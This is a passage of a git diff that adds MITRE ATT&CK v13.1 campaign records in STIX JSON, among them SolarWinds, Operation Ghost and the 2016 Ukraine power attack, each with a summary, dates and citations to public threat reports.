"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0016", + "external_id": "C0016" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4c840263-bbda-440d-a22b-674679ddebf1.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4c840263-bbda-440d-a22b-674679ddebf1.json new file mode 100644 index 0000000000000000000000000000000000000000..f60ecd8550b67bad67c367b64d5644035f7ed98a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4c840263-bbda-440d-a22b-674679ddebf1.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--aa7bf7ef-2a78-473b-a3c2-1d2c26aa879c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T13:06:44.395Z", + "name": "Operation Spalax", + "description": "[Operation Spalax](https://attack.mitre.org/campaigns/C0005) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://attack.mitre.org/campaigns/C0005) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://attack.mitre.org/groups/G0099), however identified enough differences to report this as separate, unattributed activity.(Citation: ESET Operation Spalax Jan 2021) ", + "aliases": [ + "Operation Spalax" + ], + "first_seen": "2019-11-01T05:00:00.000Z", + "last_seen": "2021-01-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Operation Spalax Jan 2021)", + "x_mitre_last_seen_citation": "(Citation: ESET Operation Spalax Jan 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4c840263-bbda-440d-a22b-674679ddebf1", + "created": "2022-09-16T15:32:41.893Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0005", + "external_id": "C0005" + }, + { + "source_name": "ESET Operation Spalax Jan 2021", + "description": "M. Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. Retrieved September 16, 2022.", + "url": "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30.json new file mode 100644 index 0000000000000000000000000000000000000000..814a9275dd9ca59b2b7a4609eb2aa959b0dc2e6e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--b8160102-bc8e-45c8-a186-25f99fdf99f8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-14T16:34:50.791Z", + "name": "C0018", + "description": "\n[C0018](https://attack.mitre.org/campaigns/C0018) was a month-long ransomware intrusion that successfully deployed [AvosLocker](https://attack.mitre.org/software/S1053) onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing [AvosLocker](https://attack.mitre.org/software/S1053).(Citation: Costa AvosLocker May 2022)(Citation: Cisco Talos Avos Jun 2022)", + "aliases": [ + "C0018" + ], + "first_seen": "2022-02-01T05:00:00.000Z", + "last_seen": "2022-03-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cisco Talos Avos Jun 2022)", + "x_mitre_last_seen_citation": "(Citation: Cisco Talos Avos Jun 2022)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Flavio Costa, Cisco" + ], + "type": "campaign", + "id": "campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30", + "created": "2023-01-17T21:42:34.998Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0018", + "external_id": "C0018" + }, + { + "source_name": "Costa AvosLocker May 2022", + "description": "Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.", + "url": "https://www.linkedin.com/pulse/raas-avoslocker-incident-response-analysis-fl%C3%A1vio-costa?trk=articles_directory" + }, + { + "source_name": "Cisco Talos Avos Jun 2022", + "description": "Venere, G. Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. Retrieved January 11, 2023.", + "url": "https://blog.talosintelligence.com/avoslocker-new-arsenal/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--712e38c3-a656-426a-9b3b-a6bfb63294c6.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--712e38c3-a656-426a-9b3b-a6bfb63294c6.json new file mode 100644 index 0000000000000000000000000000000000000000..5c0ffb5ade6cce08b4c3381bf5931b35c7c82e11 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--712e38c3-a656-426a-9b3b-a6bfb63294c6.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--6bf4b3d6-7ad3-44b2-ae88-7dc8feca627e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T16:50:07.875Z", + "name": "C0021", + "description": "[C0021](https://attack.mitre.org/campaigns/C0021) was a spearphishing campaign conducted in November 2018 that targeted public sector institutions, non-governmental organizations (NGOs), educational institutions, and private-sector corporations in the oil and gas, chemical, and hospitality industries. The majority of targets were located in the US, particularly in and around Washington D.C., with other targets located in Europe, Hong Kong, India, and Canada. [C0021](https://attack.mitre.org/campaigns/C0021)'s technical artifacts, tactics, techniques, and procedures (TTPs), and targeting overlap with previous suspected [APT29](https://attack.mitre.org/groups/G0016) activity.(Citation: Microsoft Unidentified Dec 2018)(Citation: FireEye APT29 Nov 2018)", + "aliases": [ + "C0021" + ], + "first_seen": "2018-11-01T05:00:00.000Z", + "last_seen": "2018-11-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)", + "x_mitre_last_seen_citation": "(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--712e38c3-a656-426a-9b3b-a6bfb63294c6", + "created": "2023-03-15T19:23:36.696Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0021", + "external_id": "C0021" + }, + { + "source_name": "FireEye APT29 Nov 2018", + "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" + }, + { + "source_name": "Microsoft Unidentified Dec 2018", + "description": "Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.", + "url": "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--78068e68-4124-4243-b6f4-76e4e5be8a06.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--78068e68-4124-4243-b6f4-76e4e5be8a06.json new file mode 100644 index 0000000000000000000000000000000000000000..e9a81df98cbfc8fc3f924290a34bfe7a4deaba62 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--78068e68-4124-4243-b6f4-76e4e5be8a06.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--0be53071-d0d2-4eb2-9a91-0fecba7f9ee8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-29T20:37:46.689Z", + "name": "C0015", + "description": "[C0015](https://attack.mitre.org/campaigns/C0015) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://attack.mitre.org/software/S0534), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [Conti](https://attack.mitre.org/software/S0575), along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://attack.mitre.org/software/S0575) ransomware playbook based on the observed pattern of activity and operator errors.(Citation: DFIR Conti Bazar Nov 2021)", + "aliases": [ + "C0015" + ], + "first_seen": "2021-08-01T05:00:00.000Z", + "last_seen": "2021-08-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: DFIR Conti Bazar Nov 2021)", + "x_mitre_last_seen_citation": "(Citation: DFIR Conti Bazar Nov 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Matt Brenton, Zurich Insurance Group" + ], + "type": "campaign", + "id": "campaign--78068e68-4124-4243-b6f4-76e4e5be8a06", + "created": "2022-09-29T16:42:29.364Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0015", + "external_id": "C0015" + }, + { + "source_name": "DFIR Conti Bazar Nov 2021", + "description": "DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.", + "url": "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--7854c1a0-f06c-4876-98a4-4bbd34751b05.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--7854c1a0-f06c-4876-98a4-4bbd34751b05.json new file mode 100644 index 0000000000000000000000000000000000000000..77ba571c16adb23111e082fca1de93ff8a27c9c0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--7854c1a0-f06c-4876-98a4-4bbd34751b05.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--4f2bbbf0-fd44-4cf5-a7e0-e58a6687ed5e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-06T20:25:30.658Z", + "name": "Operation Ghost", + "description": "[Operation Ghost](https://attack.mitre.org/campaigns/C0023) was an [APT29](https://attack.mitre.org/groups/G0016) campaign starting in 2013 that included operations against ministries of foreign affairs in Europe and the Washington, D.C. embassy of a European Union country. During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used new families of malware and leveraged web services, steganography, and unique C2 infrastructure for each victim.(Citation: ESET Dukes October 2019)\n", + "aliases": [ + "Operation Ghost" + ], + "first_seen": "2013-09-01T04:00:00.000Z", + "last_seen": "2019-10-01T04:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Dukes October 2019)", + "x_mitre_last_seen_citation": "(Citation: ESET Dukes October 2019)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--7854c1a0-f06c-4876-98a4-4bbd34751b05", + "created": "2023-03-23T17:51:58.539Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0023", + "external_id": "C0023" + }, + { + "source_name": "ESET Dukes October 2019", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--808d6b30-df4e-4341-8248-724da4bac650.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--808d6b30-df4e-4341-8248-724da4bac650.json new file mode 100644 index 0000000000000000000000000000000000000000..062d2c874c4a15b1727a89f500a0a74530243253 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--808d6b30-df4e-4341-8248-724da4bac650.json @@ -0,0 +1,106 @@ +{ + "type": "bundle", + "id": "bundle--34b0598f-e515-4c04-adfa-9e6f6fabbf00", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T00:41:06.231Z", + "name": "SolarWinds Compromise", + "description": "The [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) was a sophisticated supply chain cyber operation conducted by [APT29](https://attack.mitre.org/groups/G0016) that was discovered in mid-December 2020. [APT29](https://attack.mitre.org/groups/G0016) used customized malware to inject malicious code into the SolarWinds Orion software build process that was later distributed through a normal software update; they also used password spraying, token theft, API abuse, spear phishing, and other supply chain attacks to compromise user accounts and leverage their associated access. Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting initially referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: SolarWinds Advisory Dec 2020)(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Volexity SolarWinds)(Citation: CrowdStrike StellarParticle January 2022)(Citation: Unit 42 SolarStorm December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: Microsoft Internal Solorigate Investigation Blog) \n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to Russia's Foreign Intelligence Service (SVR); public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021)(Citation: Mandiant UNC2452 APT29 April 2022) The US government assessed that of the approximately 18,000 affected public and private sector customers of Solar Winds\u2019 Orion product, a much smaller number were compromised by follow-on [APT29](https://attack.mitre.org/groups/G0016) activity on their systems.(Citation: USG Joint Statement SolarWinds January 2021) ", + "aliases": [ + "SolarWinds Compromise" + ], + "first_seen": "2019-08-01T05:00:00.000Z", + "last_seen": "2021-01-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Unit 42 SolarStorm December 2020)", + "x_mitre_last_seen_citation": "(Citation: MSTIC NOBELIUM May 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--808d6b30-df4e-4341-8248-724da4bac650", + "created": "2023-03-24T14:59:26.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0024", + "external_id": "C0024" + }, + { + "source_name": "Volexity SolarWinds", + "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.", + "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + }, + { + "source_name": "CrowdStrike StellarParticle January 2022", + "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", + "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" + }, + { + "source_name": "USG Joint Statement SolarWinds January 2021", + "description": "FBI, CISA, ODNI, NSA. (2022, January 5). Joint Statement by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA). Retrieved March 26, 2023.", + "url": "https://www.cisa.gov/news-events/news/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure" + }, + { + "source_name": "FireEye SUNBURST Backdoor December 2020", + "description": "FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + }, + { + "source_name": "Mandiant UNC2452 APT29 April 2022", + "description": "Mandiant. (2020, April 27). Assembling the Russian Nesting Doll: UNC2452 Merged into APT29. Retrieved March 26, 2023.", + "url": "https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29" + }, + { + "source_name": "MSTIC NOBELIUM May 2021", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" + }, + { + "source_name": "Microsoft Internal Solorigate Investigation Blog", + "description": "MSRC Team. (2021, February 18). Microsoft Internal Solorigate Investigation \u2013 Final Update. Retrieved May 14, 2021.", + "url": "https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate-investigation-final-update/" + }, + { + "source_name": "Microsoft Analyzing Solorigate Dec 2020", + "description": "MSTIC. (2020, December 18). Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers . Retrieved January 5, 2021.", + "url": "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/" + }, + { + "source_name": "NSA Joint Advisory SVR SolarWinds April 2021", + "description": "NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.", + "url": "https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF" + }, + { + "source_name": "SolarWinds Advisory Dec 2020", + "description": "SolarWinds. (2020, December 24). SolarWinds Security Advisory. Retrieved February 22, 2021.", + "url": "https://www.solarwinds.com/sa-overview/securityadvisory" + }, + { + "source_name": "SolarWinds Sunburst Sunspot Update January 2021", + "description": "Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021.", + "url": "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/" + }, + { + "source_name": "UK NSCS Russia SolarWinds April 2021", + "description": "UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.", + "url": "https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise" + }, + { + "source_name": "Unit 42 SolarStorm December 2020", + "description": "Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.", + "url": "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8.json new file mode 100644 index 0000000000000000000000000000000000000000..3f552f8237521905f2fdae96e4dfd57ef4cd278b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--4dd547fe-67d0-4c9c-9727-926079e07c25", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-10T16:19:33.560Z", + "name": "FunnyDream", + "description": "[FunnyDream](https://attack.mitre.org/campaigns/C0007) was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign to possible Chinese-speaking threat actors through the use of the [Chinoxy](https://attack.mitre.org/software/S1041) backdoor and noted infrastructure overlap with the TAG-16 threat group.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: Kaspersky APT Trends Q1 2020)(Citation: Recorded Future Chinese Activity in Southeast Asia December 2021)", + "aliases": [ + "FunnyDream" + ], + "first_seen": "2018-07-01T05:00:00.000Z", + "last_seen": "2020-11-01T04:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Kaspersky APT Trends Q1 2020)", + "x_mitre_last_seen_citation": "(Citation: Bitdefender FunnyDream Campaign November 2020)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8", + "created": "2022-09-20T17:29:09.547Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0007", + "external_id": "C0007" + }, + { + "source_name": "Kaspersky APT Trends Q1 2020", + "description": "Global Research and Analysis Team. (2020, April 30). APT trends report Q1 2020. Retrieved September 19, 2022.", + "url": "https://securelist.com/apt-trends-report-q1-2020/96826/" + }, + { + "source_name": "Recorded Future Chinese Activity in Southeast Asia December 2021", + "description": "Insikt Group. (2021, December 8). Chinese State-Sponsored Cyber Espionage Activity Supports Expansion of Regional Power and Influence in Southeast Asia. Retrieved September 19, 2022.", + "url": "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf" + }, + { + "source_name": "Bitdefender FunnyDream Campaign November 2020", + "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--93c23946-49af-41f4-ac03-40f9ffc7419b.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--93c23946-49af-41f4-ac03-40f9ffc7419b.json new file mode 100644 index 0000000000000000000000000000000000000000..9d8a5cbab91894a945156702175dd0d00214bb3b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--93c23946-49af-41f4-ac03-40f9ffc7419b.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--cba28732-0979-4ae3-a021-0f777cbe1686", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:06:05.468Z", + "name": "Operation CuckooBees", + "description": "[Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was conducted by actors affiliated with [Winnti Group](https://attack.mitre.org/groups/G0044), [APT41](https://attack.mitre.org/groups/G0096), and BARIUM.(Citation: Cybereason OperationCuckooBees May 2022)", + "aliases": [ + "Operation CuckooBees" + ], + "first_seen": "2019-12-01T07:00:00.000Z", + "last_seen": "2022-05-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cybereason OperationCuckooBees May 2022)", + "x_mitre_last_seen_citation": "(Citation: Cybereason OperationCuckooBees May 2022)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Andrea Serrano Urea, Telef\u00f3nica Tech" + ], + "type": "campaign", + "id": "campaign--93c23946-49af-41f4-ac03-40f9ffc7419b", + "created": "2022-09-22T20:07:47.208Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0012", + "external_id": "C0012" + }, + { + "source_name": "Cybereason OperationCuckooBees May 2022", + "description": "Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022.", + "url": "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json new file mode 100644 index 0000000000000000000000000000000000000000..710bec3825c1a4616fbdf61da367fa3d91b82e90 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--626c4e39-d60c-4bf6-8f2d-ef953f699462", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-10T21:18:24.743Z", + "name": "2016 Ukraine Electric Power Attack", + "description": "[2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "aliases": [ + "2016 Ukraine Electric Power Attack" + ], + "first_seen": "2016-12-01T05:00:00.000Z", + "last_seen": "2016-12-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_last_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "created": "2023-03-31T17:22:23.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0025", + "external_id": "C0025" + }, + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + 